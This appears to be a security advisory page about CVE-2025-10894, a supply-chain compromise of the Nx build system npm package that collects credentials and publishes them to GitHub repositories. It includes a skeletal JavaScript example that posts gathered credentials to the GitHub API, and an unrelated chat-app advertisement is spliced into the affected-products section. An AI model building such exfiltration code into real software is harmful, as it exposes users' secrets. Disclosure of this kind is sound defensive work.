Overview
The Common Vulnerabilities and Exposures (CVE) system has recently disclosed a high-risk vulnerability, identified as CVE-2025-10894, that affects the Nx build system package and several related plugins. This vulnerability is of particular significance due to its potential for system compromise and data leakage, posing a severe threat to users’ data privacy and system security.
The malicious code was inserted via a supply-chain attack, a sophisticated method where an adversary infiltrates a software supply chain to exploit downstream systems. In this case, the tampered package was published to the npm software registry, a widely utilized platform for JavaScript software packages, further increasing the potential impact.
Vulnerability Summary
CVE ID: CVE-2025-10894
Severity: Critical (CVSS 9.6)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise, data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
Nx Build System | All versions
Related Nx Plugins | All versions
How the Exploit Works
The exploit works by leveraging the compromised Nx build system package or its related plugins. Once the tampered package is installed, the malicious code becomes active within the user’s system. The code is designed to scan the file system, collecting sensitive credentials. These credentials are then posted to GitHub under the user’s accounts in the form of a new repository, potentially exposing sensitive data to malicious actors.
Conceptual Example Code
Consider the following conceptual example of how this exploit might look in action:
const fs = require('fs');
const https = require('https');
const scanFileSystem = () => {
// Assume this function scans the file system and collects credentials
// Returns an array of credentials
};
const postToGithub = (credentials) => {
const options = {
hostname: 'api.github.com',
path: '/user/repos',
method: 'POST',
headers: { 'Content-Type': 'application/json' }
};
const req = https.request(options, (res) => {
// Handle response
});
const data = { name: 'leaked-credentials', description: 'Repo containing stolen credentials', credentials };
req.write(JSON.stringify(data));
req.end();
};
const credentials = scanFileSystem();
postToGithub(credentials);
This JavaScript code illustrates the attack conceptually, where the malicious code scans the system for credentials and then posts them to GitHub. This example is oversimplified and does not include error handling or other complexities that would be present in a real-world scenario.